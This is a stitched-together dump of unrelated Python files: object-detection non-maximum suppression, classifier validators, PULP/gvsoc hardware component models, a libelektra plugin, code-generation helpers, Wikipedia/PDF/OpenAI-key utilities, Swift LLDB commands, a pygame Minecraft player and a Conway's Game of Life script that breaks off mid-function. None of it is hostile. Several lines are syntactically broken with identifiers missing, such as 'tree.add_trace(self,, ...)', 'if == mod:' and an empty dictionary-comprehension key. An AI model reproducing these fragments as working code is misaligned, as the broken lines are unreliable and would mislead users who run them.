valid_nb_labels_score = nb_labels_score[valid_nb_bboxes_inidces] valid_nb_anchors_indices = nb_anchors_indices[valid_nb_bboxes_inidces] # for a given iou threshod, evaluate iou between the bboxes if not self.iou_threshold is None: valid_nb_bboxes, valid_nb_confidences, valid_nb_labels_score, valid_nb_labels, valid_nb_anchor_indices =\ self.fast_greedy_non_maximum_suppression( valid_nb_bboxes, valid_nb_confidences, valid_nb_labels_score, valid_nb_labels, valid_nb_anchors_indices) 'apply <max_detections_per_class>' for class_id in range(1, num_classes): # select class information class_indices = valid_nb_labels == class_id if np.sum(class_indices > 0): # be sure that at least one bbox does exist temp_bboxes = valid_nb_bboxes[class_indices, :] temp_labels = valid_nb_labels[class_indices] temp_labels_score = valid_nb_labels_score[class_indices] temp_anchor_indices = valid_nb_anchor_indices[class_indices] # sort according to the scores max_args = np.argsort(-temp_labels_score, axis=0) temp_bboxes = temp_bboxes[max_args, :] temp_labels = temp_labels[max_args] temp_labels_score = temp_labels_score[max_args] temp_anchor_indices = temp_anchor_indices[max_args] to_keep = min(len(temp_labels), self.max_detections_per_class) predicted_bboxes.append(temp_bboxes[:to_keep, :]) predicted_labels.append(temp_labels[:to_keep]) predicted_labels_score.append(temp_labels_score[:to_keep]) predicted_anchor_indices.append(temp_anchor_indices[:to_keep]) 'now concatenate predictions for all classes.' predicted_bboxes = np.concatenate(predicted_bboxes) predicted_labels = np.concatenate(predicted_labels) predicted_labels_score = np.concatenate(predicted_labels_score) predicted_anchor_indices = np.concatenate(predicted_anchor_indices) 'apply <max_total_detections>' to_keep = min(len(predicted_labels), self.max_total_detections) max_args = np.argsort(-predicted_labels_score, axis=0) predicted_bboxes = predicted_bboxes[max_args[:to_keep], :] predicted_labels = predicted_labels[max_args[:to_keep]] predicted_labels_score = predicted_labels_score[max_args[:to_keep]] predicted_anchor_indices = predicted_anchor_indices[max_args[:to_keep]] return predicted_bboxes, predicted_labels_score, predicted_labels def __call__(self, decoded_bboxes, scores): ''' use nms core to decode predictions decoded_bboxes: [batch_size, number_anchors, 4] scores: [batch_size, number_anchors, number of classes] ''' # add batch dimension, if not included if decoded_bboxes.ndim == 2: decoded_bboxes = decoded_bboxes.reshape([1, -1, decoded_bboxes.shape[1]]) if scores.ndim == 2: scores = scores.reshape([1, -1, scores.shape[1]]) # for all batch items detections = [[]] * decoded_bboxes.shape[0] for i in range(len(detections)): bboxes, scores, classes = self.nms_core(decoded_bboxes[i, :, :], scores[i, :, :]) detections[i] = Detection(bboxes, scores, classes) return detections ``` #### File: nntool/utils/ ```python import json import os from abc import ABC, abstractmethod import numpy as np SUPPORTED_PREDICTION = {'classification'} #add 'object-detection' class ValidateBase(ABC): def __init__(self, class_thr=0, binary_classification=False, type_of_prediction='classification'): if type_of_prediction not in SUPPORTED_PREDICTION: raise NotImplementedError("type_of_prediction must be in %r, %s not supported" %SUPPORTED_PREDICTION, type_of_prediction) self.class_thr = class_thr self.binary_classification = binary_classification self.labels = [] self.predictions = [] @abstractmethod def validate(self, input_name, predicted): pass class ValidateFromClass(ValidateBase): def __init__(self, class_number, type_of_prediction='classification', **kargs): super().__init__(type_of_prediction=type_of_prediction, **kargs) self._class_number = class_number #the label are all the same def validate(self, input_name, predicted): predicted = predicted.flatten() if self.binary_classification: class_predicted = int(predicted > self.class_thr) margin = abs(predicted - self.class_thr) else: class_predicted = int(np.argmax(predicted)) if np.amax(predicted) > self.class_thr else 0 margin = predicted[class_predicted] - np.average(np.delete(predicted, [class_predicted])) self.predictions.append(class_predicted) self.labels.append(self._class_number) return class_predicted == self._class_number, class_predicted, self._class_number, margin class ValidateFromName(ValidateBase): #the label are the last digits in the filename def validate(self, input_name, predicted): num_classes = predicted.size filename, _ = os.path.splitext(input_name) num_classes_digits = len(str(num_classes-1)) label = int(filename[-(num_classes_digits):]) predicted = predicted.flatten() if self.binary_classification: class_predicted = int(predicted > self.class_thr) margin = abs(predicted - self.class_thr) else: class_predicted = int(np.argmax(predicted)) if np.amax(predicted) > self.class_thr else 0 margin = predicted[class_predicted] - np.average(np.delete(predicted, [class_predicted])) self.predictions.append(class_predicted) self.labels.append(label) return class_predicted == label, class_predicted, label, margin class ValidateFromJSON(ValidateBase): def __init__(self, json_file, **kargs): super().__init__(**kargs) with open(json_file) as file: self.annotations = json.load(file) def validate(self, input_name, predicted): #num_classes = predicted.size _, file = os.path.split(input_name) label = self.annotations[file] predicted = predicted.flatten() if self.binary_classification: class_predicted = int(predicted > self.class_thr) margin = abs(predicted - self.class_thr) else: class_predicted = int(np.argmax(predicted)) if np.amax(predicted) > self.class_thr else 0 margin = predicted[class_predicted] - np.average(np.delete(predicted, [class_predicted])) self.predictions.append(class_predicted) self.labels.append(label) return class_predicted == label, class_predicted, label, margin class ValidateFromVWWInstances(ValidateBase): def __init__(self, instances_file, **kargs): super().__init__(**kargs) with open(instances_file) as file: self.instances = json.load(file) def validate(self, input_name, predicted): _, file_name = os.path.split(input_name) for image in self.instances['images']: if image['file_name'] == file_name: idx = image['id'] label = self.instances['annotations'][str(idx)]['label'] break predicted = predicted.flatten() if self.binary_classification: class_predicted = int(predicted > self.class_thr) margin = abs(predicted - self.class_thr) else: class_predicted = int(np.argmax(predicted)) if np.amax(predicted) > self.class_thr else 0 margin = predicted[class_predicted] - np.average(np.delete(predicted, [class_predicted])) self.predictions.append(class_predicted) self.labels.append(label) return class_predicted == label, class_predicted, label, margin ``` #### File: devices/i2c/ ```python import gsystree as st from ips.clock.clock_domain import Clock_domain class Corruptor(st.Component): def __init__(self, parent, name, address=80): super(Corruptor, self).__init__(parent, name) corruptor = Corruptor.Corruptor_implem(self, 'corruptor', address=address) clock = Clock_domain(self, 'clock', frequency=10000000) self.bind(clock, 'out', corruptor, 'clock') self.bind(corruptor, 'i2c', self, 'i2c') self.bind(corruptor, 'clock_cfg', clock, 'clock_in') class Corruptor_implem(st.Component): def __init__(self, parent, name, address): super(Corruptor.Corruptor_implem, self).__init__(parent, name) self.add_property('vp_component', 'devices.i2c.corruptor.i2c_corruptor') ``` #### File: ips/cache/ ```python import gsystree as st from ips.cache.cache import Cache from ips.interco.interleaver import Interleaver import math class Hierarchical_cache(st.Component): def __init__(self, parent, name, config): super(Hierarchical_cache, self).__init__(parent, name) # # Properties # self.add_properties(config) nb_cores = self.get_property('nb_cores') has_cc = self.get_property('has_cc') nb_l1_banks = self.get_property('nb_l1_banks') nb_l1_banks_log2 = int(math.log(nb_l1_banks, 2.0)) nb_pes = nb_cores - 1 if has_cc else nb_cores l1_line_size_bits = self.get_property('l1/line_size_bits', int) l1_cache_line_size = 1 << l1_line_size_bits # # Components # # L0 caches l0_caches = [] for i in range(0, nb_pes): l0_caches.append(Cache(self, 'l0_bank%d' % i, **self.get_property('l0'))) if has_cc: l0_caches.append(Cache(self, 'l0_bank%d' % (nb_cores-1), **self.get_property('l0_cc'))) # L1 caches l1_caches = [] for i in range(0, nb_l1_banks): l1_caches.append(Cache(self, 'l1_bank%d' % i, **self.get_property('l1'), refill_shift=nb_l1_banks_log2, add_offset=i*l1_cache_line_size)) # L1 interleaver interleaver = Interleaver(self, 'interleaver', nb_slaves=nb_l1_banks, interleaving_bits=l1_line_size_bits) # # Bindings # # L0 caches for i in range(0, nb_cores): self.bind(self, 'input_%d' % i, l0_caches[i], 'input') self.bind(l0_caches[i], 'refill', interleaver, 'input') self.bind(self, 'enable', l0_caches[i], 'enable') self.bind(self, 'flush', l0_caches[i], 'flush') # L1 cache for i in range(0, nb_l1_banks): self.bind(l1_caches[i], 'refill', self, 'refill') self.bind(self, 'enable', l1_caches[i], 'enable') self.bind(self, 'flush', l1_caches[i], 'flush') # Interleaver for i in range(0, nb_l1_banks): self.bind(interleaver, 'out_%d' % i, l1_caches[i], 'input') ``` #### File: ips/clock/ ```python import gsystree as st class Clock_domain(st.Component): def __init__(self, parent, name, frequency, factor=1): super(Clock_domain, self).__init__(parent, name) self.add_properties({ 'vp_component': "vp.clock_domain_impl", 'frequency': frequency, 'factor': factor }) def gen_gtkw(self, tree, comp_traces): tree.add_trace(self, 'cycles', 'cycles', tag='clock') tree.add_trace(self, 'period', 'period', tag='overview') ``` #### File: ips/ne16/ ```python import gsystree as st class Ne16(st.Component): def __init__(self, parent, name): super(Ne16, self).__init__(parent, name) self.add_properties({ 'vp_component': 'pulp.ne16.ne16', }) def gen_gtkw(self, tree, traces): if tree.get_view() == 'overview': map_file = tree.new_map_file(self, 'state') map_file.add_value(1, 'CadetBlue', 'ACTIVE') tree.add_trace(self,, 'ne16_busy', '[7:0]', map_file=map_file, tag='overview') else: map_file = tree.new_map_file(self, 'core_state', width=32) map_file.add_value(0, 'black', 'IDLE') map_file.add_value(1, 'CadetBlue', 'START') map_file.add_value(2, 'CadetBlue', 'START_STREAMIN') map_file.add_value(3, 'CadetBlue', 'STREAMIN_LOAD') map_file.add_value(4, 'CadetBlue', 'LOAD_MATRIXVEC') map_file.add_value(5, 'CadetBlue', 'STREAMIN') map_file.add_value(6, 'CadetBlue', 'LOAD') map_file.add_value(7, 'CadetBlue', 'MATRIXVEC') map_file.add_value(8, 'CadetBlue', 'NORMQUANT_SHIFT') map_file.add_value(9, 'CadetBlue', 'NORMQUANT_MULT') map_file.add_value(10, 'CadetBlue', 'NORMQUANT_BIAS') map_file.add_value(11, 'CadetBlue', 'STREAMOUT') map_file.add_value(12, 'CadetBlue', 'END') tree.add_trace(self,, 'fsm_state', '[31:0]', map_file=map_file, tag='overview') def gen_gtkw_conf(self, tree, traces): if tree.get_view() == 'overview': self.vcd_group(self, skip=True) else: self.vcd_group(self, skip=False) ``` #### File: ips/udma/ ```python import gsystree as st class Udma(st.Component): def __init__(self, parent, name, config_file): super(Udma, self).__init__(parent, name) self.vcd_group(self, skip=True) self.add_properties(self.load_property_file(config_file)) def gen_gtkw(self, tree, traces): if tree.get_view() == 'overview': map_file = tree.new_map_file(self, 'udma_state') map_file.add_value(1, 'CadetBlue', 'ACTIVE') udma_signals = [ ['hyper0', '', '[7:0]'], ['hyper1', '', '[7:0]'] ] tree.add_vector(self,, traces=udma_signals, map_file=map_file, tag='overview') ``` #### File: python/pulp_open/ ```python import gsystree as st import ips.interco.router as router class Soc_interco(st.Component): def __init__(self, parent, name, soc, cluster): super(Soc_interco, self).__init__(parent, name) ll_ico = router.Router(self, 'll_ico') ll_ico.add_mapping('apb' , **soc.get_property('peripherals/mapping')) ll_ico.add_mapping('rom' , base=soc.get_property('apb_ico/mappings/rom/base'), size=soc.get_property('apb_ico/mappings/rom/size')) ll_ico.add_mapping('axi_master' , **cluster.get_property('mapping')) ll_ico.add_mapping('l2_priv0' , **soc.get_property('l2/priv0/mapping')) ll_ico.add_mapping('l2_priv0_alias', **soc.get_property('l2/priv0_alias/mapping')) ll_ico.add_mapping('l2_priv1' , **soc.get_property('l2/priv1/mapping')) ll_ico.add_mapping('l2_shared' , **soc.get_property('l2/shared/mapping')) self.bind(self, 'debug', ll_ico, 'input') self.bind(self, 'axi_slave', ll_ico, 'input') hb_ico = router.Router(self, 'hb_ico', remove_offset=soc.get_property('l2/shared/mapping/base')) l2_shared_size = soc.get_property('l2/shared/mapping/size', int) l2_shared_nb_regions = soc.get_property('l2/shared/nb_regions') region_base = soc.get_property('l2/shared/mapping/base', int) region_size = int(l2_shared_size / l2_shared_nb_regions) for i in range(0, soc.get_property('l2/shared/nb_regions')): hb_ico.add_mapping('l2_shared_%d' % i, base=region_base, size=region_size, remove_offset=region_base) self.bind(hb_ico, 'l2_shared_%d' % i, self, 'l2_shared_%d' % i) region_base += region_size fc_fetch_ico = router.Router(self, 'fc_fetch_ico', latency=5) fc_data_ico = router.Router(self, 'fc_data_ico') fc_fetch_ico.add_mapping('l2_shared', **soc.get_property('l2/shared/mapping')) fc_fetch_ico.add_mapping('xip', **soc.get_property('l2/xip/mapping')) self.bind(fc_fetch_ico, 'xip', self, 'fc_fetch_input') fc_data_ico.add_mapping('xip', **soc.get_property('l2/xip/mapping')) self.bind(fc_data_ico, 'xip', self, 'fc_data_input') fc_fetch_ico.add_mapping('ll_ico') fc_data_ico.add_mapping('l2_shared', **soc.get_property('l2/shared/mapping')) fc_data_ico.add_mapping('axi_proxy', base=0x20000000, size=0x10000000) fc_data_ico.add_mapping('ll_ico') udma_rx_ico = router.Router(self, 'udma_rx_ico') udma_rx_ico.add_mapping('l2_shared', **soc.get_property('l2/shared/mapping')) self.bind(udma_rx_ico, 'l2_shared', hb_ico, 'input') udma_rx_ico.add_mapping('ll_ico') self.bind(udma_rx_ico, 'll_ico', ll_ico, 'input') udma_tx_ico = router.Router(self, 'udma_tx_ico', latency=4) udma_tx_ico.add_mapping('l2_shared', **soc.get_property('l2/shared/mapping')) self.bind(udma_tx_ico, 'l2_shared', hb_ico, 'input') udma_tx_ico.add_mapping('ll_ico') self.bind(udma_tx_ico, 'll_ico', ll_ico, 'input') self.bind(self, 'udma_tx', udma_tx_ico, 'input') self.bind(self, 'input', hb_ico, 'input') self.bind(self, 'fc_fetch', fc_fetch_ico, 'input') self.bind(self, 'fc_data', fc_data_ico, 'input') self.bind(fc_fetch_ico, 'l2_shared', hb_ico, 'input') self.bind(fc_fetch_ico, 'll_ico', ll_ico, 'input') self.bind(fc_data_ico, 'l2_shared', hb_ico, 'input') self.bind(fc_data_ico, 'll_ico', ll_ico, 'input') self.bind(fc_data_ico, 'axi_proxy', self, 'axi_proxy') self.bind(udma_rx_ico, 'l2_shared', hb_ico, 'input') self.bind(udma_rx_ico, 'll_ico', ll_ico, 'input') self.bind(udma_rx_ico, 'l2_shared', hb_ico, 'input') self.bind(udma_rx_ico, 'll_ico', ll_ico, 'input') self.bind(ll_ico, 'apb', self, 'apb') self.bind(ll_ico, 'rom', self, 'apb') self.bind(ll_ico, 'l2_priv0', self, 'l2_priv0') self.bind(ll_ico, 'l2_priv0_alias', self, 'l2_priv0') self.bind(ll_ico, 'l2_priv1', self, 'l2_priv1') self.bind(ll_ico, 'l2_shared', hb_ico, 'input') self.bind(ll_ico, 'axi_master', self, 'axi_master') ```
{ "source": "0003088/libelektra-qt-gui-test", "score": 2 }
#### File: python/python/ ```python import kdb import configparser class ElektraPlugin(object): def __init__(self): pass def open(self, errorKey): print("[CLASS-PYTHON-C] open") return 0 def get(self, returned, parentKey): print("[CLASS-PYTHON-C] get") mod = "system/elektra/modules/python" if == mod: returned.append(kdb.Key(mod, kdb.KEY_VALUE, "contract below")) returned.append(kdb.Key(mod+"/infos", kdb.KEY_VALUE, "contract below")) returned.append(kdb.Key(mod+"/infos/provides", kdb.KEY_VALUE, "storage")) returned.append(kdb.Key(mod+"/infos/placements", kdb.KEY_VALUE, "getstorage setstorage")) return 1 config = configparser.ConfigParser() config.readfp(open(parentKey.value)) for s in config.sections(): for o in config.options(s): returned.append(kdb.Key("/"+s+"/"+o, kdb.KEY_VALUE, config.get(s, o))) return 1 def set(self, returned, parentKey): print("[CLASS-PYTHON-C] set") return 1 def error(self, returned, parentKey): print("[CLASS-PYTHON-C] error") return 1 def close(self, errorKey): print("[CLASS-PYTHON-C] <-- close") return 0 ``` #### File: python/python/ ```python class ElektraPlugin(object): def open(self, errorKey): return 0 def get(self, returned, parentKey): return -1 def set(self, returned, parentKey): return -1 def error(self, returned, parentKey): return -1 def close(self, errorKey): return 0 ``` #### File: gen/support/ ```python from support.c import * class CppSupport(CSupport): def generateotransform(self, info, index): """Generates the code to transform values""" k = "override/#" + str(index) + "/transform/cpp" if k in info: f = info.get(k) return f; return "return value" def generateftransform(self, info, index): """Generates the code to transform values""" k = "fallback/#" + str(index) + "/transform/cpp" if k in info: f = info.get(k) return f; return "return value" def funcpretty(self, key): """Return pretty printed key name for functions""" return key.title().replace('_','').replace('/','').replace('#','') def getfuncname(self, key): """CamelCase""" return "get"+self.funcname(key) def setfuncname(self, key): """CamelCase""" return "set"+self.funcname(key) def valof(self, info): """Return the default value for given parameter""" val = info["default"] type = info["type"] if self.isenum(info): return " = "+self.enumname(info)+"::"+val+";" elif type == "string" and val == "": return ' = "";' return " = "+val+";" def typeof(self, info): """Return the type for given parameter""" type = info["type"] if type == "string": return "std::string" elif self.isenum(info): return self.enumname(info) else: return "kdb::"+type+"_t" if __name__ == "__main__": import doctest doctest.testmod() ``` #### File: gen/support/ ```python import uuid generated_uuid = str(uuid.uuid4()).replace('-','_').upper() from os.path import basename, dirname def includeguard(filename): if filename == '-': return "ELEKTRA_GEN_" + generated_uuid + "_H" else: return "ELEKTRA_GEN_" + generated_uuid + "_" + filename.replace('.','_').upper() ```
{ "source": "000alen/Phaedra", "score": 3 }
#### File: Phaedra/Phaedra/ ```python from typing import Dict, List import wikipedia def wsummary(query: str) -> str: """Returns Wikipedia summary. :param query: Query to search Wikipedia for. :type query: str :return: Summary of the Wikipedia page. :rtype: str """ return wikipedia.summary(query) def wsuggestion(query: str) -> Dict[str, str]: """Returns Wikipedia suggestions. :param query: Query to search Wikipedia for. :type query: str :return: Dictionary of suggestions. :rtype: Dict[str, str] """ suggestions, _ =, results=5, suggestion=True) return {suggestion: for suggestion in suggestions} def wimage(query: str) -> List[str]: """Returns Wikipedia image. :param query: Query to search Wikipedia for. :type query: str :return: URL of the Wikipedia image. :rtype: str """ wikipedia_page = return wikipedia_page.images ``` #### File: Phaedra/Phaedra/ ```python import json from typing import Dict import openai def get_secrets() -> Dict[str, str]: """Gets secrets from local file (secret.json). :return: Dictionary of secrets. :rtype: Dict[str, str] """ with open("secrets.json") as file: secrets = json.load(file) return secrets def get_secrets_remote() -> Dict[str, str]: """Gets secrets from remote file (secret.json) located in Google Drive. Must be ran from Google Colaboratory. :return: Dictionary of secrets. :rtype: Dict[str, str] """ from google.colab import drive # type: ignore drive.mount("/content/drive") with open("/content/drive/MyDrive/secrets.json") as file: secrets = json.load(file) return secrets def set_secrets(secrets: Dict[str, str]): """Loads secrets (credentials). :param secrets: Dictionary of secrets. :type secrets: Dict[str, str] """ openai.api_key = secrets["KEY"] ``` #### File: Phaedra/Phaedra/ ```python import re import string from typing import List, Union, BinaryIO import pdfplumber # type: ignore from nltk import word_tokenize, corpus, download # type: ignore download("punkt") download("stopwords") download("wordnet") __all__ = ("extract_text_from_pdf", "extract_text_from_pdf_to_pages", "preprocess_text") stop_words = corpus.stopwords.words("english") title_expression = re.compile(r"[0-9]+\.(\w|\s)+") def extract_text_from_pdf(file_path_or_stream: Union[str, BinaryIO]) -> str: """Extracts text from a PDF file. :param file_path_or_stream: The path to the PDF file or a file-like object. :type file_path_or_stream: str | BinaryIO :return: The extracted text. :rtype: str """ return "".join( page.extract_text() for page in ) def extract_text_from_pdf_to_pages( file_path_or_stream: Union[str, BinaryIO] ) -> List[str]: """Extracts text from a PDF file and separates it into pages. :param file_path_or_stream: The path to the PDF file or a file-like object. :type file_path_or_stream: str | BinaryIO :return: The extracted text separated into pages. :rtype: list[str] """ return [page.extract_text() for page in] # XXX: Hacky def preprocess_text(text: str) -> str: """Preprocesses text (tries to remove useless text). :param text: The text to preprocess. :type text: str :return: The preprocessed text. :rtype: str """ response_text: str = "" for line in text.split("\n"): all_words = word_tokenize(line) has_stop_word = False for word in all_words: if word.lower() in stop_words: has_stop_word = True break acceptable_word = has_stop_word if any(c not in string.printable for c in line): acceptable_word = False if title_expression.match(line): acceptable_word = True if "[" in line.split(" ")[0] and "]" in line.split(" ")[0]: acceptable_word = True if line.count(" ") > len(line) / 5: acceptable_word = False if acceptable_word: response_text += line + "\n" return response_text ```
{ "source": "000james000/swift", "score": 2 }
#### File: utils/lldb/ ```python import argparse import os import shlex import subprocess import sys import tempfile import lldb REPO_BASE = os.path.abspath(os.path.join(__file__, os.pardir, os.pardir, os.pardir, os.pardir)) SWIFT_REPO = os.path.join(REPO_BASE, "swift") LLVM_REPO = os.path.join(REPO_BASE, "llvm") LLVM_DATAFORMATTER_PATH = os.path.join(LLVM_REPO, "utils", "") SWIFT_DATAFORMATTER_PATH = os.path.join(SWIFT_REPO, "utils", "lldb", "") def import_llvm_dataformatters(debugger): if not os.access(LLVM_DATAFORMATTER_PATH, os.F_OK): print("WARNING! Could not find LLVM data formatters!") return cmd = 'command script import {}'.format(LLVM_DATAFORMATTER_PATH) debugger.HandleCommand(cmd) print("Loaded LLVM data formatters.") def import_swift_dataformatters(debugger): if not os.access(SWIFT_DATAFORMATTER_PATH, os.F_OK): print("WARNING! Could not find Swift data formatters!") return cmd = 'command script import {}'.format(SWIFT_DATAFORMATTER_PATH) debugger.HandleCommand(cmd) print("Loaded Swift data formatters.") VIEWCFG_PATH = os.path.join(SWIFT_REPO, "utils", "viewcfg") BLOCKIFYASM_PATH = os.path.join(SWIFT_REPO, "utils", "dev-scripts", "blockifyasm") def disassemble_asm_cfg(debugger, command, exec_ctx, result, internal_dict): """ This function disassembles the current assembly frame into a temporary file and then uses that temporary file as input to blockifyasm | viewcfg. This will cause a pdf of the cfg to be opened on Darwin. """ d = exec_ctx.frame.Disassemble() with tempfile.TemporaryFile() as f: f.write(bytes(d, 'utf-8')) f.flush() p1 = subprocess.Popen([BLOCKIFYASM_PATH], stdin=f, stdout=subprocess.PIPE) subprocess.Popen([VIEWCFG_PATH], stdin=p1.stdout) p1.stdout.close() # Allow p1 to receive a SIGPIPE if p2 exits. def disassemble_to_file(debugger, command, exec_ctx, result, internal_dict): """This function disassembles the current assembly frame into a file specified by the user. """ parser = argparse.ArgumentParser(prog='disassemble-to-file', description=""" Dump the disassembly of the current frame to the specified file. """) parser.add_argument('file', type=argparse.FileType('w'), default=sys.stdout) args = parser.parse_args(shlex.split(command)) args.file.write(exec_ctx.frame.disassembly) def sequence(debugger, command, exec_ctx, result, internal_dict): """ Combine multiple semicolon separated lldb commands into one command. This command is particularly useful for defining aliases and breakpoint commands. Some examples: # Define an alias that prints rax and also steps one instruction. command alias xs sequence p/x $rax; stepi # Breakpoint command to show the frame's info and arguments. breakpoint command add -o 'seq frame info; reg read arg1 arg2 arg3' # Override `b` to allow a condition to be specified. For example: # b someMethod if someVar > 2 command regex b s/(.+) if (.+)/seq _regexp-break %1; break mod -c "%2"/ s/(.*)/_regexp-break %1/ """ interpreter = debugger.GetCommandInterpreter() for subcommand in command.split(';'): subcommand = subcommand.strip() if not subcommand: continue # skip empty commands ret = lldb.SBCommandReturnObject() interpreter.HandleCommand(subcommand, exec_ctx, ret) if ret.GetOutput(): print >>result, ret.GetOutput().strip() if not ret.Succeeded(): result.SetError(ret.GetError()) result.SetStatus(ret.GetStatus()) return def __lldb_init_module(debugger, internal_dict): import_llvm_dataformatters(debugger) import_swift_dataformatters(debugger) debugger.HandleCommand('command script add disassemble-asm-cfg ' '-f lldbToolBox.disassemble_asm_cfg') debugger.HandleCommand('command script add disassemble-to-file ' '-f lldbToolBox.disassemble_to_file') debugger.HandleCommand('command script add sequence ' '-h "Run multiple semicolon separated commands" ' '-f lldbToolBox.sequence') ```
{ "source": "000Nobody/2D-Minecraft", "score": 3 }
#### File: scripts/classes/ ```python import pygame import os from ..core_functions import move, distance from ...variables import * class Player: def __init__(self, start_pos, width, height, vel, jump_height, reach_distance=4): self.width = width self.height = height self.vel = vel self.jump_height = jump_height self.reach_distance = reach_distance self.rect = pygame.Rect(start_pos[0], start_pos[1], width, height) self.coords = (self.rect.x//TILE_SIZE, self.rect.y//TILE_SIZE) self.pixel_coords = (self.coords[0] * TILE_SIZE, self.coords[1] * TILE_SIZE) self.jumping = False self.moving_right = False self.moving_left = False self.movement = [0, 0] self.selected_block = None self.current_chunk = (0, 0) self.inventory = [] self.current_animation = 'idle' self.animations = self.load_animations('data/imgs/player') self.animation_counter = 0 self.animation_flip = False def move(self, tile_rects): self.rect, self.collision_types, self.hit_list = move(self.rect, tile_rects, self.movement) if self.collision_types['bottom'] and not self.jumping: self.movement[1] = 1 if not self.collision_types['bottom']: self.jumping = False self.movement[1] += GRAVITY_STRENGTH if self.collision_types['top']: self.movement[1] = 1 if self.moving_right: self.movement[0] = self.vel self.current_animation = 'walk' self.animation_flip = False if self.moving_left: self.movement[0] = -self.vel self.current_animation = 'walk' self.animation_flip = True if self.jumping and self.collision_types['bottom']: self.movement[1] = -self.jump_height self.jumping = False if not self.moving_left and not self.moving_right: self.movement[0] = 0 self.current_animation = 'idle' if self.movement[1] > 30: self.movement[1] = 30 def get_selected_block(self, terrain, mx, my): mx += scroll[0] my += scroll[1] selected_coords = (mx//TILE_SIZE, my//TILE_SIZE) for block in if selected_coords == block.coords: if distance(selected_coords, self.coords) <= self.reach_distance: if not block.rect.colliderect(self.rect): self.selected_block = block else: self.selected_block = None else: self.selected_block = None def break_block(self, terrain, hotbar): self.current_animation = 'break' if self.selected_block and self.selected_block.type != 'air': self.inventory.append(self.selected_block.type) hotbar.add_block_to_slot(self.selected_block.type, 1) terrain.remove_block(self.selected_block.pos) def place_block(self, terrain, hotbar): self.current_animation = 'place' if (self.selected_block and self.selected_block.type == 'air'): if hotbar.selected_slot_content != []: if hotbar.selected_slot_content[1] > 0: if terrain.add_block(self.selected_block.pos, hotbar.selected_slot_content[0]): hotbar.slot_contents[hotbar.selected_slot][1] -= 1 def load_animations(self, dir): animation_dict = {} for animation in os.listdir(dir): frame_list = [] for frame in os.listdir(dir + '/' + animation): img = pygame.image.load(dir+'/'+animation+'/'+frame).convert_alpha() img = pygame.transform.scale(img, (TILE_SIZE*2-10, TILE_SIZE*2-10)) frame_list.append(img) animation_dict[animation] = frame_list return animation_dict def draw(self, display): # temp_rect = pygame.Rect(self.rect.x - scroll[0], self.rect.y - scroll[1], self.width, self.height) # pygame.draw.rect(display, 'white', temp_rect) if self.animation_counter//7 < len(self.animations[self.current_animation]): current_img = self.animations[self.current_animation][self.animation_counter//7] else: self.animation_counter = 0 current_img = self.animations[self.current_animation][self.animation_counter//7] self.animation_counter += 1 if self.animation_flip: current_img = pygame.transform.flip(current_img, True, False) scrolled_pos = (self.rect.x - scroll[0]-30, self.rect.y - scroll[1]+3) display.blit(current_img, scrolled_pos) if self.selected_block: block_rect = pygame.Rect( self.selected_block.x - scroll[0], self.selected_block.y - scroll[1], TILE_SIZE, TILE_SIZE ) pygame.draw.rect(display, 'black', block_rect, 3) def update(self, terrain): self.move(terrain.tile_rects) self.coords = (self.rect.x//TILE_SIZE, self.rect.y//TILE_SIZE) self.pixel_coords = (self.coords[0] * TILE_SIZE, self.coords[1] * TILE_SIZE) for block in if self.coords == block.coords: self.current_chunk = block.chunk ``` #### File: data/scripts/ ```python import pygame import math def draw(display, *classes): display.fill((227, 247, 255)) for item in classes: if isinstance(item, list): for i in item: i.draw(display) else: item.draw(display) pygame.display.update() def move(rect, tiles, movement): collision_types = {'top':False,'bottom':False,'right':False,'left':False} rect.x += movement[0] hit_list = collision_check(rect, tiles) for tile in hit_list: if movement[0] > 0: rect.right = tile.left collision_types['right'] = True elif movement[0] < 0: rect.left = tile.right collision_types['left'] = True rect.y += movement[1] hit_list = collision_check(rect, tiles) for tile in hit_list: if movement[1] > 0: rect.bottom = collision_types['bottom'] = True elif movement[1] < 0: = tile.bottom collision_types['top'] = True return rect, collision_types, hit_list def collision_check(rect, tiles): hit_list = [] for tile in tiles: if tile not in hit_list: if rect.colliderect(tile): hit_list.append(tile) return hit_list def distance(pos1, pos2): x = (pos2[0] - pos1[0])**2 y = (pos2[1] - pos1[1])**2 return math.sqrt(x + y) def draw_rect_alpha(display, color, rect): shape_surf = pygame.Surface(pygame.Rect(rect).size, pygame.SRCALPHA) pygame.draw.rect(shape_surf, color, shape_surf.get_rect()) display.blit(shape_surf, rect) ```
{ "source": "000Nobody/Conways-Game-Of-Life", "score": 3 }
#### File: 000Nobody/Conways-Game-Of-Life/ ```python import sys import pygame from pygame.locals import * run = __name__ == '__main__' clock = pygame.time.Clock() #-----Options------ WINDOW_SIZE = (1920, 1080) # (width, height) in pixels CELL_SIZE = 10 # in pixels FPS = 15 # number of generations per second #------------------ screen = pygame.display.set_mode(WINDOW_SIZE) display = pygame.Surface(WINDOW_SIZE) cells = [] setting_up = True lmousedown = False rmousedown = False show_grid = False columns = WINDOW_SIZE[0] // CELL_SIZE rows = WINDOW_SIZE[1] // CELL_SIZE play_button_img = pygame.image.load('images/play_button.png').convert_alpha() pause_button_img = pygame.image.load('images/pause_button.png').convert_alpha() class Cell(): def __init__(self, x, y, size): self.x = x self.y = y self.size = size = False self.x_coord = self.x // size self.y_coord = self.y // size self.rect = pygame.Rect(x, y, size, size) def getNeighbors(self, cells): # Translates the cells position in the 2d array in # 8 directions to find the neighboring cells neighbors = [] translate_directions = [ [0, 1], [1, 0], [0,-1], [-1,0], [1,-1], [-1,1], [1, 1], [-1,-1], ] for translation in translate_directions: x = self.x_coord + translation[0] y = self.y_coord + translation[1] # check if neighbor exists if x < 0 or y < 0 or x >= len(cells[0]) or y >= len(cells): continue neighbors.append(cells[y][x]) return neighbors def update(self): living_neigbhors = 0 for neighbor in self.neighbors: if living_neigbhors += 1 if if living_neigbhors < 2: self.lives_next_round = False elif living_neigbhors > 3: self.lives_next_round = False else: self.lives_next_round = True else: if living_neigbhors == 3: self.lives_next_round = True else: self.lives_next_round = False # Setting self.lives_next_round instead of so that all cells can update their state at the same time def draw(self, display): if pygame.draw.rect(display, (255, 255, 255), self.rect) else: if show_grid: pygame.draw.rect(display, (150, 150, 150), self.rect, 1) # Creating cells and storing them in a 2d array for i in range(rows): cells.append([Cell(j*CELL_SIZE, i*CELL_SIZE, CELL_SIZE) for j in range(columns)]) # Once all cells are created, find all of their neighbors for row in cells: for cell in row: cell.neighbors = cell.getNeighbors(cells) def draw(): display.fill((50, 50, 50)) for row in cells: for cell in row: cell.draw(display) if setting_up: display.blit(pause_button_img, (0, WINDOW_SIZE[1]-70)) else: display.blit(play_button_img, (0, WINDOW_SIZE[1]-70)) screen.blit(display, (0, 0)) 